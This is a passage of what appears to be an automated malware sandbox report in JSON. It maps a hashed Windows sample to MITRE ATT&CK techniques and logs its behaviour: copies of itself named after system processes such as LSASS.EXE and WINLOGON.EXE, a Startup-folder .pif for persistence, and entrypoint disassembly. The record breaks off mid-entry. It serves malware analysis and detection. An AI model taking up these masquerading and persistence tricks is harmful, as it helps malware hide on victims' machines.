"attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location C:\\D3_08.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location C:\\D3_08.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.scr to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.scr to new location C:\\D3_08.exe (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"CopyFileA\" to copy C:\\\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005816)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE506D.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE4741.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE5073.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4745.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrD3_08.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4E36.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"services.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"shell.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"New Folder.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"WINLOGON.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE506D.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], 